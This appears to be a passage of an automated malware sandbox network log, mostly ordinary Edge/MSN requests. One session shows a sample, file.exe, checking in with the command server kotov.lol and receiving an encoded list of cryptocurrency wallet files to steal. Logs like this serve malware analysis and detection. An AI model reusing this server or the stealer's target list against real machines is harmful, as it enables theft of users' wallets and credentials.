2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49817	108.139.47.92	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	1012	OUT	GET /b2?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1D1a855ad4f7b332cc35e551732879687; XID=1D1a855ad4f7b332cc35e551732879687
2024-11-29 11:28:10 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Fri, 29 Nov 2024 11:28:10 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 f5b36a6d650578e8cf7b1700c37caa00.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: EEz6KyK-LasIii5V1-ZfQZhVNIAvY3XPsSfgjvGGvWGNh2CaYPHAYQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49818	20.110.205.119	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:10 UTC	1261	OUT	GET /c.gif?rnd=1732879686233&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ecdf21827ba149bbbcdd7ab6ae707f63&activityId=ecdf21827ba149bbbcdd7ab6ae707f63&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1956C2ECABBF4BD89972CE41F155F45C&MUID=0D52E8701DB86AF23F08FD361CDF6BCA HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; SM=T
2024-11-29 11:28:10 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT Accept-Ranges: bytes ETag: "8d3dafd6e71fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=0D52E8701DB86AF23F08FD361CDF6BCA; domain=.msn.com; expires=Wed, 24-Dec-2025 11:28:10 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=0D52E8701DB86AF23F08FD361CDF6BCA; domain=c.msn.com; expires=Wed, 24-Dec-2025 11:28:10 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 06-Dec-2024 11:28:10 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 29-Nov-2024 11:38:10 GMT; path=/; SameSite=None; Secure; Date: Fri, 29 Nov 2024 11:28:10 GMT Connection: close Content-Length: 42
2024-11-29 11:28:10 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49819	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:10 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:11 UTC	536	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:10 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: ec34ac0d-301e-0064-75f8-41d8a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112810Z-174f7845968vqt9xhC1EWRgten0000000ztg000000008tfd Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-29 11:28:11 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49820	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:10 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:11 UTC	516	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:11 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 14b5679a-e01e-0066-7651-42da5d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112811Z-174f7845968l4kp6hC1EWRe8840000001000000000008ewx Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:11 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49825	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:11 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:11 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------FIDGDAKFHIEHJKFHDHDBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FIDGDAKFHIEHJKFHDHDBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FIDGDAKFHIEHJKFHDHDBCont
2024-11-29 11:28:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:11 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49826	23.96.180.189	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:11 UTC	1018	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0D52E8701DB86AF23F08FD361CDF6BCA&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=c12382b3d316466c9e11010216d8d4e5 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-29 11:28:12 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2791 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132516-T700343875-C128000000002115729+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002115729+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Fri, 29 Nov 2024 11:28:11 GMT Connection: close
2024-11-29 11:28:12 UTC	2791	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 47 6f 6c 64 65 6e 20 47 61 74 65 20 48 69 67 68 6c 61 6e 64 73 20 4e 50 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 47 6f 6c 64 65 6e Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Golden Gate Highlands NP\",\"cta\":\"https:\/\/www.bing.com\/search?q=Golden

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49827	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:12 UTC	634	OUT	GET /tenant/amp/entityid/BB1msDBP.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:13 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msDBP Last-Modified: Wed, 20 Nov 2024 15:58:39 GMT X-Source-Length: 59155 X-Datacenter: eastus X-ActivityId: 95d59d89-9e78-4fb4-b5cb-b42dc811ee6a Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 59155 Cache-Control: public, max-age=59520 Expires: Sat, 30 Nov 2024 04:00:12 GMT Date: Fri, 29 Nov 2024 11:28:12 GMT Connection: close
2024-11-29 11:28:13 UTC	15866	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: c1 9d a0 da 00 d4 26 32 c8 84 1b 03 01 50 d3 b8 4a 59 c9 cf ab 29 a6 9e 07 ad e5 79 ba 73 52 c4 f1 5d 06 d9 59 b5 65 39 46 3b 9b 71 9c 79 b7 db dd 9c 27 c9 f4 29 1c e2 72 9c ed 39 89 26 76 13 93 cc cf 09 c6 6a 5e 9e 39 46 51 70 d0 22 04 c9 a9 a4 82 90 4a 34 92 44 90 08 da c8 51 9c 92 40 34 da 41 24 69 24 d1 f8 20 dd 04 bd 90 02 11 04 5d db c6 49 55 14 d7 7a 4c a9 5f 27 94 ee 50 5d 26 82 b1 cf 2c 79 4c a3 2c 31 9e 71 0e 3d 7d 9d a2 96 9f 1c 0e 6e 67 21 98 be c7 d1 f2 3d 58 53 37 8f 51 9c 79 b0 cb d3 e1 2f 07 5f 2a d5 e8 a7 57 2e 96 83 e8 ae 9a 6a bd 26 61 57 29 91 5d f4 25 c0 e9 c7 d6 71 89 f9 39 f2 f4 77 ca 61 cf 75 08 d8 92 2c 97 4c ec d2 2b 04 92 46 56 90 2d 90 a0 c8 11 6c 85 21 a4 13 0c 0f a2 0d 00 20 94 22 30 b6 20 ca c5 0a 11 40 ac 04 81 81 05 13 26 Data Ascii: &2PJY)ysR]Ye9F;qy')r9&vj^9FQp"J4DQ@4A$i$ ]IUzL_'P]&,yL,1q=}ng!=XS7Qy/_*W.j&aW)]%q9wau,L+FV-l! "0 @&
